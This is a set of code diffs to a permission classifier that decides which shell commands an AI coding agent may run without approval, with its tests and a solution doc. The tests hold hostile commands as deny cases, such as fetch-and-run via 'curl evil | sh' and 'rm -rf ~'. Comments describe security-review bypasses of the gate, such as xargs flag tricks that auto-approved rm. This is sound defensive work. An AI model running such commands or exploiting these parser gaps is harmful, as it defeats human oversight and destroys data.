 - Relaxing a blanket deny by reusing an existing allowlist for a new front-end (e.g.
   `xargs` reusing `FIND_EXEC_SAFE_COMMANDS`): re-confirm every entry's read-only
-  premise holds for the new consumer, and skip the new command's flags structurally,
-  never lexing the inner command (§4, §6).
+  premise holds for the new consumer (§6), and when the front-end has flags, treat
+  flag-skipping as parsing — enumerate only flags whose `getopt` arity is certain,
+  deny on any token whose arity you can't determine (bare `--long`, optional-arg
+  short flags), and pin it with executed-exploit review against the real `getopt`
+  (§6 "structural flag-skipping IS a parser differential").
 - Reviewing `tier1.py` / `policy.py` / `permissions.py` in claude-pilot.
 
 ## Related

--- a/docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md
+++ b/docs/solutions/security-issues/command-string-policy-allow-rules-are-compound-unsafe.md
@@ -503,10 +503,9 @@ the Python side intentionally diverges (hardened) until the Rust side mirrors.
   write target** (`/tmp` heredoc, and every structural write rule —
   `bash-cp-mv`/`bash-mkdir`/`bash-git-show-redirect`) is a runtime concern
   outside static policy scope (see #5; closing it policy-wide = cpp#38).
-- **Known-open gap (filed cpp#47):** the sanctioned `cat > /tmp/<token> <<EOF`
-  exception (§2) returns BEFORE the §1/§4/§8 substitution-marker veto and admits an
-  *unquoted* `EOF` delimiter, so `$(…)` / backtick / `${ …; }` funsub in the heredoc
-  **body** expand and auto-approve (reproduced on bash 5.3.9). Distinct from the
-  accepted in-worktree-execution residual above: the sanctioned heredoc is *designed
-  to be inert*. Fix shape (quoted-delimiter restriction vs body-scan) needs an
-  architect call — see cpp#47.
+- **Resolved (cpp#47):** the sanctioned `cat > /tmp/<token> <<EOF` exception (§2)
+  formerly admitted an *unquoted* `EOF` delimiter, so `$(…)` / backtick / `${ …; }`
+  funsub in the heredoc **body** expanded and auto-approved before the
+  substitution-marker veto ran (reproduced on bash 5.3.9). Fixed by requiring a
+  **quoted** delimiter (`<<'EOF'` / `<<"EOF"`), which disables body expansion and
+  makes the body provably inert — see §2 and `_SANCTIONED_HEREDOC_OPENER_RE`.

--- a/src/claude_pilot/tier1.py
+++ b/src/claude_pilot/tier1.py
@@ -122,7 +122,15 @@ TIER3_PATTERNS: tuple[re.Pattern[str], ...] = (
     re.compile(r"\bbash\s+-c\b"),
     re.compile(r"\bsh\s+-c\b"),
     re.compile(r"\beval\s"),
-    re.compile(r"\bxargs\b"),
+    # NOTE: the blanket `\bxargs\b` deny was REMOVED here (cpp#40), for the same
+    # reason the `find … -exec` blanket deny was (cpp#33): it was the SOLE guard
+    # for xargs' inner command, which the header doctrine forbids. xargs safety
+    # now lives in the allow-list layer: `_is_safe_xargs_command()` admits
+    # `xargs [flags] <cmd>` only when `<cmd>` is in the SAME closed-world
+    # FIND_EXEC_SAFE_COMMANDS read-only allowlist `find -exec` uses. `xargs sh -c`
+    # / `xargs bash -c` stay independently caught by the `sh -c`/`bash -c`
+    # patterns just above (defense in depth); `xargs sudo`/`xargs rm` deny because
+    # they are not in the allowlist.
     # NOTE: the blanket `find … -(exec|execdir|delete)` deny was REMOVED here
     # (cpp#33). It was the SOLE protection for find's exec sub-feature, which
     # the TIER3 header doctrine above forbids — a denylist entry must never be
@@ -193,7 +201,13 @@ them — use the auto-approved native tool, which accomplishes the same goal:
   the current worktree — so prefer it for cross-worktree file comparison.
 - In-place edits via `sed -i` → use the **Edit** tool.
 - Writing files via shell redirect (`>`, `>>`) → use the **Write** tool.
-- `xargs`, `eval`, `bash -c`, `sh -c` → use the dedicated native tool
+- `xargs` with a NON-read-only inner command (`xargs rm`, `xargs sh -c …`,
+  `xargs bash -c …`, `xargs sudo …`) → use the dedicated native tool. A read-only
+  inner command (`grep`, `cat`, `head`, `tail`, `ls`, `stat`, `wc`, `echo`, …) IS
+  auto-approved, so `find … | xargs grep -l "pattern"` runs without halting. Still
+  prefer **Grep**/**Glob** for searching, but a read-only `xargs` no longer crashes
+  the session.
+- `eval`, `bash -c`, `sh -c` → use the dedicated native tool
   (Grep/Glob/Read/Edit/Write) for the underlying goal.
 
 Prefer Read, Write, Edit, Grep, and Glob over their shell equivalents: they are
@@ -290,19 +304,34 @@ def _split_compound_command(command: str) -> list[str]:
 
 
 def contains_unquoted_metacharacter(command: str) -> bool:
-    """Return True if *command* contains an unquoted backtick, ``$(`` or ``$'``.
+    """Return True if *command* contains a backtick, ``$(`` or ``$'`` that bash
+    would expand — i.e. anywhere EXCEPT inside single quotes.
 
-    Mirrors ``contains_unquoted_metacharacter`` in
-    ``crates/mika-agent/src/server/permission_pre_classifier.rs`` (mika repo).
-    Quote handling follows POSIX semantics:
+    Bash performs command substitution inside double quotes; only single quotes
+    suppress it. So the name is historical: the function flags substitution
+    markers in unquoted AND double-quoted regions, treating only single-quoted
+    regions as inert. Quote handling follows POSIX semantics:
 
-    - Inside ``"..."`` regions, ``\\"`` is an escape pair (skipped atomically).
+    - Outside quotes, a bare backtick, ``$(`` or ``$'`` returns True.
+    - Inside ``"..."`` regions, a bare backtick or ``$(`` returns True (cpp#41
+      closed the double-quoted gap — bash expands both there). ``$'`` is NOT
+      flagged inside double quotes: ANSI-C ``$'...'`` quoting is only recognized
+      outside quotes, so inside a double-quoted region ``$'`` is literal.
+    - Inside ``"..."`` regions, ``\\X`` is an escape pair (skipped atomically),
+      so a backslash-suppressed ``\\$(``/``\\```` is NOT flagged and ``\\"`` does
+      not close the region.
     - Inside ``'...'`` regions, backslash is literal — ``'foo\\\\'`` closes at
       the second ``'`` and any backtick that follows is unquoted.
     - Unterminated quotes: the scanner treats all remaining bytes as inside the
       quote (conservative — falls through to the LLM relay on malformed input).
 
-    See mika#944 (ANSI-C quoting bypass), mika#946 (mika#938 F5 sentinel).
+    NOTE: the Rust mirror ``contains_unquoted_metacharacter`` in
+    ``crates/mika-agent/src/server/permission_pre_classifier.rs`` (mika repo) does
+    NOT yet detect double-quoted substitution. This Python side intentionally
+    diverges (hardened) until the paired-audit ticket mirrors the cpp#41 fix.
+
+    See mika#944 (ANSI-C quoting bypass), mika#946 (mika#938 F5 sentinel),
+    cpp#41 (double-quoted substitution gap).
     """
     n = len(command)
     i = 0
@@ -311,12 +340,34 @@ def contains_unquoted_metacharacter(command: str) -> bool:
     while i < n:
         ch = command[i]
         if quote_state is not None:
-            # Inside a quoted region — handle escape (double-quoted only) then close.
+            # Inside a quoted region — handle escape (double-quoted only) first.
             if quote_state == '"' and ch == '\\' and i + 1 < n:
+                # Skip the `\X` pair. In bash, `\` inside double quotes suppresses
+                # `$`/backtick, so `"\$(x)"` / "\`x\`" are literal — skipping the
+                # pair correctly prevents flagging a SUPPRESSED substitution. `\"`
+                # likewise does not close the region (handled by skipping here).
                 i += 2
                 continue
             if ch == quote_state:
                 quote_state = None
+                i += 1
+                continue
+            # cpp#41: bash performs command substitution inside DOUBLE quotes —
+            # only SINGLE quotes suppress it. The pre-cpp#41 scanner treated a
+            # double-quoted region as inert and missed `$(`/backtick, so
+            # `grep "$(id)"` auto-approved and bash ran `id`. Scan double-quoted
+            # regions for the two markers bash STILL expands there: `$(` and
+            # backtick. `$'` is deliberately NOT flagged inside double quotes —
+            # ANSI-C `$'...'` quoting is only recognized OUTSIDE quotes; inside a
+            # double-quoted region `$'` is a literal dollar + apostrophe (no
+            # expansion), so flagging it would be a false positive (mika#944's
+            # `$'` guard correctly lives in the UNQUOTED branch only). Single-
+            # quoted regions stay fully inert (bash literal semantics).
+            if quote_state == '"':
+                if ch == "`":
+                    return True
+                if ch == "$" and i + 1 < n and command[i + 1] == "(":
+                    return True
             i += 1
             continue
 
@@ -471,6 +522,11 @@ SAFE_SHELL_COMMANDS: frozenset[str] = frozenset({
     # explicitly. See plan: docs/plans/2026-06-08-001-fix-27-tier1-drop-awk-sed-plan.md
     "ls", "cat", "head", "tail", "wc", "find", "grep",
     "echo", "printf", "dirname", "basename",
+    # `xargs` is NOT read-only on its own — it runs an inner command. Membership
+    # here only passes the SAFE_SHELL_COMMANDS gate; the actual safety decision is
+    # made by the `xargs` special-case in is_safe_shell_command (cpp#40), exactly
+    # like `find` is special-cased to _is_safe_find_command.
+    "xargs",
     "realpath", "readlink", "stat", "file", "which", "type",
     "pwd", "date", "sort", "uniq", "tr", "cut", "diff",
     "comm", "test", "[",
@@ -501,14 +557,27 @@ _FIRST_WORD_RE = re.compile(r"^\s*(\S+)")
 # proven-live RCE (cpp#33 security review). The native Grep tool (ripgrep-backed)
 # covers the search use case without the exec surface.
 #
-# LOAD-BEARING PRECONDITION (cpp#44): `grep`/`egrep`/`fgrep` are read-only ONLY
-# under GNU grep. `ugrep` (a drop-in `grep` on some Gentoo/BSD/Homebrew hosts)
-# adds `--filter=CMD` / `--pager` / `--view`, which execute commands — the same
-# class as `rg --pre`. The pilot runs in standard-Linux containers where
-# `find -exec` resolves to GNU `/bin/grep`, so this is safe in the deployment
-# target; cpp#44 tracks verifying the container grep provider and reconsidering
-# these entries if a ugrep host is ever in scope. Do not add a new grep-family
-# entry without re-checking that precondition.
+# LOAD-BEARING PRECONDITION (cpp#44, RESOLVED): `grep`/`egrep`/`fgrep` are
+# read-only ONLY under GNU grep. `ugrep` (a drop-in `grep` on some
+# Gentoo/BSD/Homebrew hosts) adds `--filter=CMD` / `--pager` / `--view`, which
+# execute commands — the same RCE class as `rg --pre` (which got `rg` dropped in
+# cpp#33). This allowlist also backs `xargs <cmd>` (cpp#40), so the precondition
+# governs both `find -exec grep` and `xargs grep`.
+#
+# Resolution (cpp#44): the cpp#33 security review empirically verified that the
+# pilot's standard-Linux deployment containers resolve `find -exec` to GNU
+# `/bin/grep` 3.12, which REJECTS `--filter`/`--pager`/`--view`. The ugrep exec
+# vector is therefore NOT live in the deployment target. Decision: keep
+# `grep`/`egrep`/`fgrep` (dropping them would defeat cpp#33 — its founding
+# incidents mika#1381/#1572 are exactly `find -exec grep -l`), and treat the
+# GNU-grep premise as an ACCEPTED + tracked risk documented right here.
+#
+# Hardening boundary: NEVER denylist `--filter`/`--pager`/`--view` by parsing the
+# inner command's arguments — inner-arg lexing is forbidden (solution-doc §4). If
+# a host that presents ugrep as `grep` ever enters scope, DROP the grep-family
+# entries instead. A defense-in-depth startup ugrep-detection warning could live
+# in `cli.py` (NOT this pure subprocess-free classifier) and is intentionally not
+# added here. Do not add a new grep-family entry without re-checking this premise.
 FIND_EXEC_SAFE_COMMANDS: frozenset[str] = frozenset({
     "grep", "egrep", "fgrep",
     "cat", "head", "tail", "wc",
@@ -574,6 +643,69 @@ def _is_safe_find_command(sub: str) -> bool:
     return all(inner in FIND_EXEC_SAFE_COMMANDS for inner in inner_commands)
 
 
+# `xargs` short flags that take a SEPARATE value token (e.g. `-I {}`, `-n 1`,
+# `-d ,`, `-P 4`). When one of these appears as its own token, the NEXT token is
+# its value, not the inner command — skip both. Attached forms (`-n1`, `-I{}`,
+# `-P4`) and value-less flags (`-0`, `-r`, `-t`, `-x`, `-p`) are a single token
+# and skip just themselves. `-e`/`-i`/`-l` are deprecated optional-value forms;
+# treating them as value-taking over-blocks the rare separate-value spelling,
+# which is the safe failure mode. This is structural token-skipping, NOT a bash
+# lexer — we never interpret the inner command's own arguments.
+_XARGS_VALUE_FLAGS: frozenset[str] = frozenset(
+    {"-a", "-d", "-E", "-I", "-L", "-n", "-P", "-s", "-e", "-i", "-l"}
+)
+
+
+def _is_safe_xargs_command(sub: str) -> bool:
+    """Decide whether an `xargs` invocation is safe to auto-approve (cpp#40).
+
+    Sibling to `_is_safe_find_command`: `xargs [flags] <cmd> …` runs `<cmd>` for
+    each stdin record, so the safety question is identical to `find -exec <cmd>`.
+    Allow iff the first non-flag token after `xargs` (the executed binary) is in
+    the SAME closed-world FIND_EXEC_SAFE_COMMANDS read-only allowlist. We skip
+    xargs' own flags structurally (see _XARGS_VALUE_FLAGS) but never parse the
+    inner command's arguments — exact-literal match only, no inner lexing.
+
+    Denies:
+    - any command substitution (`$(`, backtick, `$'`) anywhere — a read-only
+      `xargs grep …` never needs it; its presence smuggles execution (mirrors
+      `_is_safe_find_command`; also caught at the scanner layer by cpp#41).
+    - `xargs sh -c`/`xargs bash -c` (sh/bash not in the allowlist; also caught by
+      the TIER3 `sh -c`/`bash -c` patterns — defense in depth).
+    - `xargs sudo`/`xargs rm`/etc. (not in the allowlist).
+    - a bare `xargs` with no inner command (defaults to `echo`, but ambiguous →
+      over-block is the safe default).
+    """
+    if "$(" in sub or "`" in sub or "$'" in sub:
+        return False
+
+    tokens = sub.split()
+    if not tokens or tokens[0] != "xargs":
+        return False
+
+    i = 1
+    while i < len(tokens):
+        tok = tokens[i]
+        if tok == "--":  # explicit end-of-options; next token is the command
+            i += 1
+            break
+        if tok.startswith("--"):  # GNU long option; value (if any) rides `=form`
+            i += 1
+            continue
+        if tok.startswith("-"):
+            if tok in _XARGS_VALUE_FLAGS:  # separate-value short flag → skip value
+                i += 2
+                continue
+            i += 1  # attached-value or value-less short flag → single token
+            continue
+        return tok in FIND_EXEC_SAFE_COMMANDS  # first non-flag token = inner cmd
+
+    if i < len(tokens):  # token immediately after `--`
+        return tokens[i] in FIND_EXEC_SAFE_COMMANDS
+
+    return False  # no inner command found → deny
+
+
 def is_safe_shell_command(sub: str) -> bool:
     match = _FIRST_WORD_RE.match(sub)
     if not match:
@@ -585,6 +717,9 @@ def is_safe_shell_command(sub: str) -> bool:
 
     if cmd == "find":
         return _is_safe_find_command(sub)
+
+    if cmd == "xargs":
+        return _is_safe_xargs_command(sub)
 
     return True
 

--- a/src/claude_pilot/tier1.py
+++ b/src/claude_pilot/tier1.py
@@ -605,6 +605,18 @@ _FIND_WRITE_RE = re.compile(r"-(?:fprintf|fprint0|fprint|fls)\b")
 _FIND_EXEC_INNER_RE = re.compile(r"-(?:execdir|exec|okdir|ok)\b\s+(\S+)")
 
 
+def _contains_substitution(sub: str) -> bool:
+    """True if *sub* contains any command-substitution marker (`$(`, backtick,
+    `$'`). Used as a defense-in-depth guard by the exec-class allowlist gates
+    (`_is_safe_find_command`, `_is_safe_xargs_command`): a read-only `find`/`xargs`
+    invocation never needs substitution, so its presence smuggles execution.
+    Shared so the two gates cannot drift. Note `is_safe_bash_command` also runs
+    `contains_unquoted_metacharacter` first, which catches unquoted and
+    double-quoted substitution; this substring check additionally vetoes the
+    single-quoted (inert) form — the safe-direction over-block."""
+    return "$(" in sub or "`" in sub or "$'" in sub
+
+
 def _is_safe_find_command(sub: str) -> bool:
     """Decide whether a `find` invocation is safe to auto-approve (cpp#33).
 
@@ -637,22 +649,29 @@ def _is_safe_find_command(sub: str) -> bool:
     if not inner_commands:
         return True  # pure search — no exec-class clause, no -delete
 
-    if "$(" in sub or "`" in sub or "$'" in sub:
+    if _contains_substitution(sub):
         return False
 
     return all(inner in FIND_EXEC_SAFE_COMMANDS for inner in inner_commands)
 
 
-# `xargs` short flags that take a SEPARATE value token (e.g. `-I {}`, `-n 1`,
-# `-d ,`, `-P 4`). When one of these appears as its own token, the NEXT token is
-# its value, not the inner command — skip both. Attached forms (`-n1`, `-I{}`,
-# `-P4`) and value-less flags (`-0`, `-r`, `-t`, `-x`, `-p`) are a single token
-# and skip just themselves. `-e`/`-i`/`-l` are deprecated optional-value forms;
-# treating them as value-taking over-blocks the rare separate-value spelling,
-# which is the safe failure mode. This is structural token-skipping, NOT a bash
-# lexer — we never interpret the inner command's own arguments.
+# `xargs` short flags that take a REQUIRED SEPARATE value token (e.g. `-I {}`,
+# `-n 1`, `-d ,`, `-P 4`). When one of these appears as its own token, the NEXT
+# token is its value, not the inner command — skip both. Attached forms (`-n1`,
+# `-I{}`, `-P4`) and value-less flags (`-0`, `-r`, `-t`, `-x`, `-p`) are a single
+# token and skip just themselves.
+#
+# This set lists ONLY getopt *required-argument* short flags. The deprecated
+# `-e[eof]`/`-i[replace]`/`-l[lines]` are getopt *optional-argument* forms — an
+# optional argument is taken ONLY when attached (`-i{}`), NEVER as a separate
+# token. They are deliberately EXCLUDED: if they were here, `xargs -i rm cat`
+# would skip `-i` AND `rm` (treating the real command `rm` as `-i`'s value) and
+# allow on `cat` — a confirmed auto-approval of `rm` (cpp#40 security review, P0).
+# Excluded, they fall to the single-token skip below, so `xargs -i rm cat`
+# correctly evaluates `rm` and denies. This is a parser-arity contract with GNU
+# getopt; over-block is the safe direction, NEVER under-block.
 _XARGS_VALUE_FLAGS: frozenset[str] = frozenset(
-    {"-a", "-d", "-E", "-I", "-L", "-n", "-P", "-s", "-e", "-i", "-l"}
+    {"-a", "-d", "-E", "-I", "-L", "-n", "-P", "-s"}
 )
 
 
@@ -676,7 +695,7 @@ def _is_safe_xargs_command(sub: str) -> bool:
     - a bare `xargs` with no inner command (defaults to `echo`, but ambiguous →
       over-block is the safe default).
     """
-    if "$(" in sub or "`" in sub or "$'" in sub:
+    if _contains_substitution(sub):
         return False
 
     tokens = sub.split()
@@ -689,9 +708,20 @@ def _is_safe_xargs_command(sub: str) -> bool:
         if tok == "--":  # explicit end-of-options; next token is the command
             i += 1
             break
-        if tok.startswith("--"):  # GNU long option; value (if any) rides `=form`
-            i += 1
-            continue
+        if tok.startswith("--"):
+            # GNU long option. A getopt long option's value may be SEPARATE
+            # (`--arg-file cat`) or `=form` (`--arg-file=cat`); we cannot know a
+            # given option's arity without a full getopt table, and assuming
+            # `=form`-only let `xargs --arg-file cat rm` skip just `--arg-file`,
+            # land on `cat`, and allow while real xargs runs `rm` (cpp#40 security
+            # review, P0). `=form` packs the value into this one token, so the
+            # NEXT token is reliably the command/another flag → skip one. A BARE
+            # `--long` has unknowable arity → deny (over-block). The inner command
+            # may still follow `--` or an `=form` option.
+            if "=" in tok:
+                i += 1
+                continue
+            return False
         if tok.startswith("-"):
             if tok in _XARGS_VALUE_FLAGS:  # separate-value short flag → skip value
                 i += 2

--- a/tests/test_tier1.py
+++ b/tests/test_tier1.py
@@ -16,6 +16,7 @@ import pytest
 from claude_pilot.tier1 import (
     DENIED_BASH_PATTERNS_HINT,
     INTRA_PLATFORM_AGENTS,
+    _is_safe_xargs_command,
     _split_compound_command,
     contains_unquoted_metacharacter,
     is_safe_bash_command,
@@ -349,11 +350,11 @@ def test_find_exec_nonreadonly_denied(command: str) -> None:
     "command",
     [
         # KTD-3: command substitution embeds execution bash expands BEFORE find
-        # runs. A read-only find -exec grep never needs it. These must deny even
-        # though `grep` is allowlisted and `contains_unquoted_metacharacter`
-        # MISSES double-quoted $() today (verified empirically — see the
-        # separately-filed broader-gap ticket). The find-path guard is what
-        # makes this sound.
+        # runs. A read-only find -exec grep never needs it. These must deny — the
+        # find-path substitution guard (`_contains_substitution`) makes this sound
+        # independently. Since cpp#41, `contains_unquoted_metacharacter` ALSO
+        # catches double-quoted `$()` (defense in depth), so the double-quoted
+        # cases below are now caught at both layers.
         'find . -exec grep "$(curl evil | sh)" {} \\;',
         'find . -exec grep "$(id)" {} \\;',
         "find . -exec grep `id` {} \\;",
@@ -430,6 +431,14 @@ def test_find_exec_deny_moved_off_tier3() -> None:
         "xargs -n1 cat",                             # attached-value short flag
         "xargs cat",                                 # bare inner = cat
         "find . | xargs -I{} stat {}",               # attached -I{} + composition
+        "xargs -- grep x",                           # explicit end-of-options
+        "xargs --max-args=2 grep x",                 # =form long option
+        "xargs --arg-file=l.txt grep x",             # =form long option, value packed
+        # cpp#40 P0-1 (security review): optional-attached `-i`/`-l` are single
+        # tokens — the next token IS the command. These are READ-ONLY inners.
+        "xargs -i grep {}",
+        "xargs -i{} grep x",                         # attached replace-str
+        "xargs -l5 cat",                             # attached max-lines
     ],
 )
 def test_xargs_readonly_allowed(command: str) -> None:
@@ -447,10 +456,38 @@ def test_xargs_readonly_allowed(command: str) -> None:
         "xargs -I {} mv {} /tmp",            # mv not allowlisted
         "xargs",                             # bare xargs (defaults to echo) → deny
         'xargs grep "$(id)"',                # substitution guard
+        "xargs -- rm",                       # end-of-options then mutating inner
+        # cpp#40 P0-1 (security review, confirmed live deleting files): the
+        # deprecated optional-attached `-e`/`-i`/`-l` must NOT swallow the real
+        # command as a separate value. Pre-fix these auto-approved `rm`.
+        "xargs -i rm cat",
+        "xargs -l rm cat",
+        "xargs -e rm grep",
+        "find / -type f | xargs -e rm echo",
+        # cpp#40 P0-2 (security review): a BARE separate-value long option must not
+        # swallow the command. `--arg-file cat` consumes `cat`; real xargs runs `rm`.
+        "xargs --arg-file cat rm",
+        "xargs --arg-file=l.txt rm",         # =form, inner rm → deny
+        "xargs --max-procs=2 rm",            # =form long option, mutating inner
+        # cpp#40 chain-safety: a safe xargs head with a dangerous tail denies
+        # (the raw compound is split and every segment must be safe).
+        "xargs grep x && rm -rf ~",
+        'find . -name "*.md" | xargs grep -l foo && rm -rf ~',
     ],
 )
 def test_xargs_nonreadonly_denied(command: str) -> None:
     assert is_safe_bash_command(command) is False, command
+
+
+def test_xargs_substitution_guard_denies_single_quoted() -> None:
+    """cpp#40: the `_is_safe_xargs_command` substring substitution guard denies
+    single-quoted (inert) `$(`/backtick directly — `contains_unquoted_metacharacter`
+    does NOT catch single-quoted forms, so this guard is the deny path for them.
+    Over-block is the safe direction."""
+    assert _is_safe_xargs_command("xargs grep '$(id)'") is False
+    assert _is_safe_xargs_command("xargs grep '`id`'") is False
+    # And a clean read-only xargs still passes the helper directly.
+    assert _is_safe_xargs_command("xargs grep foo") is True
 
 
 def test_xargs_deny_moved_off_tier3() -> None:

--- a/tests/test_tier1.py
+++ b/tests/test_tier1.py
@@ -65,7 +65,10 @@ def test_read_only_tools_always_approve(tool: str, cwd: str) -> None:
         "bash -c 'rm -rf /'",
         "sh -c 'echo hi'",
         "eval $(some_cmd)",
-        "xargs rm",
+        # NOTE: `xargs rm` moved to test_xargs_* below — after cpp#40 it is no
+        # longer a TIER3 match (the blanket `\bxargs\b` pattern was removed); it
+        # is denied at the allow-list layer (_is_safe_xargs_command: rm not in
+        # FIND_EXEC_SAFE_COMMANDS) instead.
         # NOTE: `find … -delete` and `find … -exec rm` moved to
         # test_find_exec_* below — after cpp#33 they are no longer TIER3
         # matches (the blanket find pattern was removed); they are denied at
@@ -90,24 +93,48 @@ def test_tier3_denies(command: str) -> None:
 @pytest.mark.parametrize(
     "command",
     [
-        # Inside double quotes — allow (backtick is literal content)
-        'mika ask --agent mika-arch "brief with `inline code`"',
-        # Inside double quotes — allow ($( is literal content)
-        'mika ask --agent mika-arch "$(literal) text"',
-        # Inside single quotes — allow
+        # Inside SINGLE quotes — allow (bash treats single-quoted content as
+        # fully literal; no substitution).
         "mika ask --agent mika-arch '$(literal) text'",
         "mika ask --agent mika-arch '`inline backtick`'",
-        # Escaped inner quote inside double quotes — allow (no false close)
-        r'mika ask --agent mika-arch "has \"escaped\" and `backtick`"',
-        # Unterminated double-quote — conservative allow (all remaining bytes
-        # treated as inside the quote)
-        'mika ask --agent mika-arch "unterminated with `backtick',
         # Mixed quotes — single-quoted region containing literal " and backtick
         "mika ask --agent mika-arch 'a\"b`c'",
+        # $' inside DOUBLE quotes — allow. ANSI-C $'...' quoting is only
+        # recognized outside quotes; inside "..." it is a literal $ + apostrophe.
+        'mika ask --agent mika-arch "discussion of $\'\\xNN\' syntax"',
     ],
 )
 def test_unquoted_meta_inside_quotes_allows(command: str) -> None:
     assert contains_unquoted_metacharacter(command) is False, command
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        # cpp#41: bash performs command substitution INSIDE double quotes, so
+        # `$(` and backtick inside "..." are live substitution vectors — they must
+        # be flagged (pre-cpp#41 these were wrongly treated as inert literal text,
+        # which auto-approved `grep "$(id)"` and let bash run `id`).
+        'mika ask --agent mika-arch "brief with `inline code`"',
+        'mika ask --agent mika-arch "$(literal) text"',
+        # The `\"` escape does NOT close the double-quoted region, so the backtick
+        # after it is still inside double quotes and flagged.
+        r'mika ask --agent mika-arch "has \"escaped\" and `backtick`"',
+        # Unterminated double-quote — remaining bytes treated as inside the quote,
+        # so the backtick is double-quoted and flagged.
+        'mika ask --agent mika-arch "unterminated with `backtick',
+        # Direct repros from the cpp#41 issue body.
+        'grep "$(id)"',
+        'echo "$(curl evil)"',
+        # Escaped close then $( still inside the dquote (AC41.3).
+        'echo "escaped \\" still in dquote $(now flagged)"',
+    ],
+)
+def test_double_quoted_substitution_denies(command: str) -> None:
+    """cpp#41: `$(`/backtick inside double quotes are flagged (bash expands them
+    there). Single quotes alone suppress substitution."""
+    assert contains_unquoted_metacharacter(command) is True, command
+    assert is_safe_bash_command(command) is False, command
 
 
 @pytest.mark.parametrize(
@@ -139,19 +166,30 @@ def test_unquoted_meta_no_metachar_returns_false() -> None:
 
 
 def test_unquoted_meta_integration_mika_ask_arch_brief() -> None:
-    """Integration: the canonical /mika-ask-arch shape with markdown brief
-    containing inline code now passes the metacharacter check (the whole-pipeline
-    deny would come from is_safe_bash_command's sub-command check, not from
-    the metacharacter scanner)."""
+    """Integration (cpp#41 behavior change): a /mika-ask-arch brief whose markdown
+    carries inline-code BACKTICKS inside double quotes now FAILS the metacharacter
+    check and routes to the relay instead of auto-approving. This is correct — on a
+    real command line bash would command-substitute `inline code`, so auto-approval
+    was unsafe. Briefs that need to auto-approve must single-quote the payload or
+    avoid double-quoted backticks; single-quoted content stays inert (see
+    test_unquoted_meta_inside_quotes_allows)."""
     cmd = (
         'mika ask --agent mika-arch --format json --verbose '
         '"Brief with `inline code` and `docs/plans/file.md`"'
     )
-    # The metacharacter check should pass (backticks are inside double quotes)
-    assert contains_unquoted_metacharacter(cmd) is False
-    # is_safe_bash_command still returns True because mika ask --agent mika-arch
-    # is in the intra-platform dispatch allow-list
-    assert is_safe_bash_command(cmd) is True
+    # Backticks inside double quotes are now flagged (bash would expand them).
+    assert contains_unquoted_metacharacter(cmd) is True
+    # End-to-end: no longer auto-approved — routes to the relay.
+    assert is_safe_bash_command(cmd) is False
+
+    # The single-quoted equivalent IS still auto-approved (genuinely inert) and
+    # remains in the intra-platform dispatch allow-list.
+    safe_cmd = (
+        "mika ask --agent mika-arch --format json --verbose "
+        "'Brief with `inline code` and `docs/plans/file.md`'"
+    )
+    assert contains_unquoted_metacharacter(safe_cmd) is False
+    assert is_safe_bash_command(safe_cmd) is True
 
 
 def test_echo_backtick_still_denied_via_metachar_check() -> None:
@@ -370,6 +408,83 @@ def test_find_exec_deny_moved_off_tier3() -> None:
     for command in ("find . -delete", "find . -type f -exec rm {} \\;"):
         assert is_tier3_dangerous(command) is False, command
         assert is_safe_bash_command(command) is False, command
+
+
+# ── cpp#40: xargs read-only inner-command allowlist ──────────────────────────
+#
+# The blanket `\bxargs\b` TIER3 deny was replaced by a closed-world inner-command
+# allowlist — the SAME FIND_EXEC_SAFE_COMMANDS set `find -exec` uses (cpp#33).
+# `xargs <readonly>` auto-approves; `xargs <mutating>` / `xargs sh -c` deny.
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        'xargs grep -l "foo" < input.txt',          # AC40.1 (inner = grep)
+        'find . -name "*.md" | xargs grep -l "foo"',  # AC40.2 (composition)
+        "xargs -I {} grep \"foo\" {}",               # AC40.3 (-I {} flag skipped)
+        "xargs -n 1 cat",                            # AC40.4 (-n value flag)
+        "xargs -0 grep x",                           # -0 value-less flag
+        "xargs -P 4 head",                           # -P value flag
+        "xargs -d , wc",                             # -d <delim> value flag
+        "xargs -n1 cat",                             # attached-value short flag
+        "xargs cat",                                 # bare inner = cat
+        "find . | xargs -I{} stat {}",               # attached -I{} + composition
+    ],
+)
+def test_xargs_readonly_allowed(command: str) -> None:
+    assert is_safe_bash_command(command) is True, command
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "xargs rm",                          # AC40.4 — rm not allowlisted
+        "xargs sudo whoami",                 # AC40.6 — sudo not allowlisted
+        "xargs sh -c 'rm $1'",               # AC40.5 — shell wrapper
+        "xargs bash -c 'id'",                # AC40.5 — shell wrapper
+        "find . | xargs rm -f",              # composition with mutating inner
+        "xargs -I {} mv {} /tmp",            # mv not allowlisted
+        "xargs",                             # bare xargs (defaults to echo) → deny
+        'xargs grep "$(id)"',                # substitution guard
+    ],
+)
+def test_xargs_nonreadonly_denied(command: str) -> None:
+    assert is_safe_bash_command(command) is False, command
+
+
+def test_xargs_deny_moved_off_tier3() -> None:
+    """cpp#40 layer-move: `xargs rm` is no longer a TIER3 match, but remains
+    denied overall at the allow-list layer (rm not in FIND_EXEC_SAFE_COMMANDS)."""
+    assert is_tier3_dangerous("xargs rm") is False
+    assert is_safe_bash_command("xargs rm") is False
+    # AC40.7: no TIER3 pattern matches a bare xargs token any more.
+    assert is_tier3_dangerous("xargs grep x") is False
+
+
+def test_xargs_sh_c_still_tier3_caught() -> None:
+    """Defense in depth: even though the allowlist denies `xargs sh -c`, the
+    TIER3 `sh -c`/`bash -c` patterns still independently catch the shell wrapper."""
+    assert is_tier3_dangerous("xargs sh -c 'id'") is True
+    assert is_tier3_dangerous("xargs bash -c 'id'") is True
+
+
+def test_xargs_founding_mika1639_shape_now_approved() -> None:
+    """cpp#40 fix anchor: the exact `find … | xargs grep -l` shape that crashed
+    the mika#1639 auto-groom (claude-pilot session 25ab3b6c, $0.59 wasted) is now
+    AUTO-APPROVED — grep is in the read-only inner-command allowlist."""
+    cmd = 'find . -name "system_prompt.md" | xargs grep -l "INTENT_GUARD"'
+    assert is_safe_bash_command(cmd) is True
+
+
+def test_denied_hint_no_longer_lists_xargs_categorically() -> None:
+    """cpp#40 AC40.5: the model-facing hint no longer tells the model xargs is
+    categorically denied; it reflects that a read-only `xargs` inner is allowed."""
+    # The new bullet distinguishes a NON-read-only xargs inner from a read-only one.
+    assert "`xargs` with a NON-read-only inner command" in DENIED_BASH_PATTERNS_HINT
+    assert "no longer crashes" in DENIED_BASH_PATTERNS_HINT
+    # The old blanket bullet ("`xargs`, `eval`, `bash -c`, `sh -c`") is gone.
